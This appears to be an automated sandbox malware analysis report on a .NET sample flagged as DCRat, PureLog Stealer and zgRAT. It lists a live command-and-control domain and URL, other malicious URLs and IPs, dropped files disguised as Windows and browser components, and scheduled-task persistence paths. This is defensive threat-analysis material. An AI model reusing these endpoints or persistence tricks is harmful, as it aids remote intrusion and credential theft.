                              Source: Yara matchFile source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED

                              Remote Access Functionality

                              barindex
                              Yara detected DCRat
                              Source: Yara matchFile source: 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1708169450.0000000013471000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: 0JLWNg4Sz1.exe PID: 7556, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7760, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: DViaOgnvmAhwCXZ.exe PID: 7784, type: MEMORYSTR
                              Yara detected PureLog Stealer
                              Source: Yara matchFile source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1665110989.0000000000FA2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED
                              Yara detected zgRAT
                              Source: Yara matchFile source: 0JLWNg4Sz1.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.0JLWNg4Sz1.exe.fa0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe, type: DROPPED
                              Source: Yara matchFile source: C:\Recovery\StartMenuExperienceHost.exe, type: DROPPED

                              Mitre Att&ck Matrix

                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity Information1
                              Scripting                              		Valid Accounts11
                              Windows Management Instrumentation                              		1
                              Scheduled Task/Job                              		12
                              Process Injection                              		12
                              Masquerading                              		OS Credential Dumping11
                              Security Software Discovery                              		Remote Services11
                              Archive Collected Data                              		1
                              Encrypted Channel                              		Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomainsDefault Accounts1
                              Scheduled Task/Job                              		1
                              Scripting                              		1
                              Scheduled Task/Job                              		1
                              Disable or Modify Tools                              		LSASS Memory2
                              Process Discovery                              		Remote Desktop ProtocolData from Removable Media2
                              Non-Application Layer Protocol                              		Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain AccountsAt1
                              DLL Side-Loading                              		1
                              DLL Side-Loading                              		31
                              Virtualization/Sandbox Evasion                              		Security Account Manager31
                              Virtualization/Sandbox Evasion                              		SMB/Windows Admin SharesData from Network Shared Drive12
                              Application Layer Protocol                              		Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                              Process Injection                              		NTDS1
                              Application Window Discovery                              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                              Deobfuscate/Decode Files or Information                              		LSA Secrets1
                              Remote System Discovery                              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                              Obfuscated Files or Information                              		Cached Domain Credentials1
                              System Network Configuration Discovery                              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                              Software Packing                              		DCSync2
                              File and Directory Discovery                              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading                              		Proc Filesystem14
                              System Information Discovery                              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                              Behavior Graph

                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1545098 Sample: 0JLWNg4Sz1.exe Startdate: 30/10/2024 Architecture: WINDOWS Score: 100 46 977255cm.nyashkoon.in 2->46 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Antivirus detection for dropped file 2->54 56 13 other signatures 2->56 8 0JLWNg4Sz1.exe 4 23 2->8         started        12 StartMenuExperienceHost.exe 2->12         started        14 DViaOgnvmAhwCXZ.exe 14 3 2->14         started        17 6 other processes 2->17 signatures3 process4 dnsIp5 36 C:\Users\user\Desktop\ALzNWdSZ.log, PE32 8->36 dropped 38 C:\Recovery\StartMenuExperienceHost.exe, PE32 8->38 dropped 40 C:\Recovery\DViaOgnvmAhwCXZ.exe, PE32 8->40 dropped 44 8 other malicious files 8->44 dropped 62 Uses schtasks.exe or at.exe to add and modify task schedules 8->62 64 Creates processes via WMI 8->64 19 cmd.exe 8->19         started        22 schtasks.exe 8->22         started        24 schtasks.exe 8->24         started        26 16 other processes 8->26 66 Antivirus detection for dropped file 12->66 68 Multi AV Scanner detection for dropped file 12->68 70 Machine Learning detection for dropped file 12->70 48 977255cm.nyashkoon.in 188.114.96.3, 49730, 49731, 49732 CLOUDFLARENETUS European Union 14->48 42 C:\Users\user\Desktop\KjTCumlu.log, PE32 14->42 dropped file6 signatures7 process8 signatures9 58 Uses ping.exe to sleep 19->58 60 Uses ping.exe to check the status of other devices and networks 19->60 28 conhost.exe 19->28         started        30 chcp.com 19->30         started        32 PING.EXE 19->32         started        34 StartMenuExperienceHost.exe 19->34         started        process10

                              Screenshots

                              Thumbnails

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand

                              Antivirus, Machine Learning and Genetic Malware Detection

                              Initial Sample

                              SourceDetectionScannerLabelLink
                              0JLWNg4Sz1.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              0JLWNg4Sz1.exe56%VirustotalBrowse
                              0JLWNg4Sz1.exe100%AviraHEUR/AGEN.1323342
                              0JLWNg4Sz1.exe100%Joe Sandbox ML

                              Dropped Files

                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%AviraHEUR/AGEN.1323342
                              C:\Users\user\AppData\Local\Temp\oLZ05R153F.bat100%AviraBAT/Delbat.C
                              C:\Recovery\StartMenuExperienceHost.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%AviraHEUR/AGEN.1323342
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%Joe Sandbox ML
                              C:\Recovery\StartMenuExperienceHost.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe100%Joe Sandbox ML
                              C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Program Files (x86)\Microsoft\Edge\smartscreen.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\DViaOgnvmAhwCXZ.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Recovery\StartMenuExperienceHost.exe66%ReversingLabsByteCode-MSIL.Trojan.DCRat
                              C:\Users\user\Desktop\ALzNWdSZ.log24%ReversingLabs
                              C:\Users\user\Desktop\KjTCumlu.log24%ReversingLabs

                              Unpacked PE Files

                              No Antivirus matches

                              Domains

                              SourceDetectionScannerLabelLink
                              977255cm.nyashkoon.in0%VirustotalBrowse

                              URLs

                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              http://977255cm.nyashkoon.in/0%VirustotalBrowse
                              http://977255cm.nyashkoon.in/secureWindows.php0%VirustotalBrowse

                              Domains and IPs

                              Contacted Domains

                              NameIPActiveMaliciousAntivirus DetectionReputation
                              977255cm.nyashkoon.in
                              		188.114.96.3
                              		truetrueunknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://977255cm.nyashkoon.in/secureWindows.phptrueunknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://977255cm.nyashkXDViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                http://977255cm.nyashkX:tDViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://977255cm.nyashkoon.in/DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmptrueunknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0JLWNg4Sz1.exe, 00000000.00000002.1703180777.0000000003F4D000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://977255cm.nyashkoon.inDViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002E12000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000029B6000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002C73000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.00000000027FE000.00000004.00000800.00020000.00000000.sdmp, DViaOgnvmAhwCXZ.exe, 00000006.00000002.4154539984.0000000002DFE000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    188.114.96.3
                                    		977255cm.nyashkoon.inEuropean Union
                                    		13335CLOUDFLARENETUStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1545098
                                    Start date and time:2024-10-30 05:21:07 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 11m 7s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:36
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:0JLWNg4Sz1.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:844679E76D8254BEDD67C98610F7D7AC.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@36/25@1/1
                                    EGA Information:
                                    • Successful, ratio: 20%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target 0JLWNg4Sz1.exe, PID 7320 because it is empty
                                    • Execution Graph export aborted for target 0JLWNg4Sz1.exe, PID 7332 because it is empty
                                    • Execution Graph export aborted for target DViaOgnvmAhwCXZ.exe, PID 7784 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 2180 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 2492 because it is empty
                                    • Execution Graph export aborted for target StartMenuExperienceHost.exe, PID 5428 because it is empty
                                    • Execution Graph export aborted for target smartscreen.exe, PID 7304 because it is empty
                                    • Execution Graph export aborted for target smartscreen.exe, PID 7344 because it is empty
                                    • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    00:22:07API Interceptor12913190x Sleep call for process: DViaOgnvmAhwCXZ.exe modified
                                    04:22:00Task SchedulerRun new task: DViaOgnvmAhwCXZ path: "C:\Users\All Users\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe"
                                    04:22:00Task SchedulerRun new task: DViaOgnvmAhwCXZD path: "C:\Program Files (x86)\google\Update\DViaOgnvmAhwCXZ.exe"
                                    04:22:02Task SchedulerRun new task: 0JLWNg4Sz1 path: "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                    04:22:02Task SchedulerRun new task: 0JLWNg4Sz10 path: "C:\Users\user\Desktop\0JLWNg4Sz1.exe"
                                    04:22:02Task SchedulerRun new task: smartscreen path: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                    04:22:02Task SchedulerRun new task: smartscreens path: "C:\Program Files (x86)\microsoft\Edge\smartscreen.exe"
                                    04:22:02Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Recovery\StartMenuExperienceHost.exe"
                                    04:22:02Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Recovery\StartMenuExperienceHost.exe"

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    188.114.96.3zxalphamn.docGet hashmaliciousLokibotBrowse
                                    • touxzw.ir/alpha2/five/fre.php
                                    QUOTATION_OCTQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                    • filetransfer.io/data-package/jI82Ms6K/download
                                    9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                    • 304773cm.n9shteam.in/jscpuGamegeneratorprivate.php
                                    DBUfLVzZhf.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                    • xilloolli.com/api.php?status=1&wallets=0&av=1
                                    R5AREmpD4S.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                    • xilloolli.com/api.php?status=1&wallets=0&av=1
                                    7950COPY.exeGet hashmaliciousFormBookBrowse
                                    • www.globaltrend.xyz/b2h2/
                                    transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                    • paste.ee/d/Gitmx
                                    19387759999PO-RFQ-INVOICE-doc.exeGet hashmaliciousFormBookBrowse
                                    • www.zonguldakescortg.xyz/483l/
                                    PO 4800040256.exeGet hashmaliciousFormBookBrowse
                                    • www.rtpngk.xyz/876i/
                                    yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                    • www.fnsds.org/

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSXhYAqi0wi5.exeGet hashmaliciousStealcBrowse
                                    • 172.67.179.207
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                    • 188.114.97.3
                                    Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                    • 188.114.97.3
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 172.64.41.3
                                    z1MRforsteamDRUM-A1_pdf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                    • 188.114.97.3
                                    https://eot.lps-china.com/f/a/pQ-JA2nitAQtMB92xwUcGg~~/AAAHUQA~/RgRpAabzP4QTAWh0dHBzOi8vYmVyZW5pY2UuZW9tYWlsOC5jb20vdW5zdWJzY3JpYmU_ZXA9MiZsPTVlNmE0MDU2LWVhZTMtMTFlZS1hNzNjLWM1NDU2ZDI0OGQ3OCZsYz0zMmVlMmQ3Yy0zMjA4LTExZWYtYTFiZS1lYjMwYzAwY2FlZDgmcD05NDM1NjNkYy05Mzc2LTExZWYtYTdkMi00NTk0MDQ5OWMzNTYmcHQ9Y2FtcGFpZ24mcHY9NCZzcGE9MTczMDA5MzQ0NCZ0PTE3MzAwOTM1NTUmcz1mNWE2NDYwZWE1NTFlYzYxZDFiNjJhZTBhNTI2NGFhNjdmYWMxN2I1MzRkNWI4MzdhNTA0MDAwM2ZhNmZmMGUwVwVzcGNldUIKZw7zIR9n2KUgilIeZ2VtbWEubG9yZW56b0BkdWJhaWhvbGRpbmcuY29tWAQAAAL5Get hashmaliciousUnknownBrowse
                                    • 172.67.132.160
                                    Uviv7rEtnt.exeGet hashmaliciousStealc, VidarBrowse
                                    • 172.67.179.207
                                    file.exeGet hashmaliciousLummaCBrowse
                                    • 188.114.96.3
                                    https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/creditodigitalelmo.com.br/solo/i2975ufuy18zkhauvhibzzxy/YWRzQGJldHdlZW4udXM=Get hashmaliciousHTMLPhisherBrowse
                                    • 104.17.25.14

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\Desktop\ALzNWdSZ.logauXl1Tzyme.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      cGZV10VyWC.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                        oLlotc8NO3.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                          PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                            9D7RwuJrth.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                              qZoQEFZUnv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                b2smJKgMG6.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                  01YP9Lwum8.exeGet hashmaliciousDCRatBrowse
                                                    wYP4G1XOF1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                      w49A5FG3yg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                        Created / dropped Files

                                                        C:\Program Files (x86)\Google\Update\3e8b633d968cb5

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with very long lines (845), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):845
                                                        Entropy (8bit):5.9115705056622225
                                                        Encrypted:false
                                                        SSDEEP:24:IvoMfyTOkSWeIgUzxXLxVX821GZsEKDrpm2H:IgMfyCkSBlUzJTX82mb6RH
                                                        MD5:0904C876FF238D3ED2575CEA1F55CADB
                                                        SHA1:D55178B6FEFF75AC3A3594C06B53FB41FD94DBC1
                                                        SHA-256:47D165999DC08ADC15B37EC84120F46ECAAECEC1332BDB7EA67A0CD0FF062E1B
                                                        SHA-512:C7EFB463CDEA9720D6293D172132AC241FEF99127ADFC482845D93FDC9579C0F025559AB14D3D8CD3241A47DCCDF36753E0617430E263A20ECC87CA436C883A9
                                                        Malicious:false
                                                        Preview:UC7WeUMJDhxxKtweoRCutDoHCZtreNCFQIFnr3A6e1nQzkQPh3lBDRHQYzTFkfozesgCoIwvRGQ2ZXScJdJklAB8ByP1j5V9MxwHDOlYHzu6BP0Ah16HVENdqiAz34MVvQpmkKY42vdwQF7w7OUs8OoIjSafNvfMnYLujOZXcBOkkbNllO2okeWhmhCRt3rGPQI13MMsy7P79EhIFz3830mJCoICMHnjTIUUSVrZCJ0nOZhi94M4AtMZn9zPDKgqTqo0tMztHe6uA94mGkCS5sjk55qTgcV2nJTivrywEcwfxcYoEMJdHOukHD5ygfNpIEG0qW1ZvPNd6DxcgCOUT1uZYsarw9QjPGXtVh8sUtr1ARoDQcSdR3WQTrc85Knw9oOzqEG8Eg9jK3YHDWaTrwSWuGZoF9wKG52WCyXMVTZu3xGZTU4itTFMW2Fkoc3EtycOBBEO9O8XXhc799UvFObx0pAKtxi2aUAFU2YRPpjfVrzyaHkoHI8fXpYVB4fLqF7CgXnHlDfap5cI0LumN3vSWfrodDQUKXyPuwSDecDEmi0bNPfzK38wUpqBp8nixKQRGMXD3rHuzrpxoQbNhaKQYC5FGQXgyfQcSiUB2b5dvO6n92WZgaAXA93EQR7nTl5UaNfF5aVGerfKFSGN389Yf3bSpPukdSJKSmMwXRdGE32Sds98LttVlgzgvMZppumLhU1cFT0me3TlAIz7PwZujyiwxpBK1yaURqvI1h212G1sMNgmXcZ3V2mtwFpZSpvpc9UTXqFs3h1c60jjJYxYYh9YEBWv1djNVLQN2MOrXr9xAJw5gGP32WR4A5PVTT1a7oGvkVq7K

                                                        C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1688064
                                                        Entropy (8bit):7.4440967682851955
                                                        Encrypted:false
                                                        SSDEEP:24576:2ztKoZmCJ4YrujnaOBDEzKt3pJqc7BnA8js2TvgAts0qB0FjbpcKSzQy8v1:O995MUzKNac7BnbbTvgCFTYQy+
                                                        MD5:844679E76D8254BEDD67C98610F7D7AC
                                                        SHA1:4222EBBB055830096B829F072783423DBE255932
                                                        SHA-256:9B08F03985D3378123BA236FAE1B41B42FCC9AF87932655A5120E04FA9A21942
                                                        SHA-512:FDDB80736936D7C0D46EC3958885237681CBBD416455D7A48D075092D38A0C5E435112C25B595B8CC99B0A8ED2143AC2F28E893373A7B6E9772EE722706A3C05
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 66%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................................. ........@.. ....................... ............@.................................`...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H...........p...........H...z............................................0..........(.... ........8........E....9...8...........84...(.... ....8....(.... ....~....{u...:....& ....8....*(.... ....~....{....:....& ....8........0.......... ........8........E........S...*...b...........8.......... ....~....{....:....& ....8....~....9.... ....~....{t...9....& ....8....8A... ....8........~....(Q...~....(U... ....?.... ....8U...r...ps....z*~....(I... .... .... ....s....~....(M......

                                                        C:\Program Files (x86)\Google\Update\DViaOgnvmAhwCXZ.exe:Zone.Identifier

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                        C:\Program Files (x86)\Microsoft\Edge\2afe4ed40d5a86

                                                        Download File
                                                        Process:C:\Users\user\Desktop\0JLWNg4Sz1.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):74
                                                        Entropy (8bit):5.492972960106603
                                                        Encrypted:false
                                                        SSDEEP:3:4mnX1KlVog7IhiUpm9BVsj1wnLuV:4mlKw6pCj1SyV
                                                        MD5:8195A5FBF2534A919BB5C737BD85423A
                                                        SHA1:9923FEB90784FE269E5E83833F0E35FC0CBC7E4D
                                                        SHA-256:5EA21141C84E3A05BB7AEFAB73A0526972AD4DFCAE9A692946A8D6794508EB15
                                                        SHA-512:53CA5566493CA04258F4678CABB64381DBFB00446CA77D2280540E250053CD6D5527274E05419169FD6F7628FDDB464289DA1431322F13908ABAFCD1F8DE56F4
                                                        Malicious:false
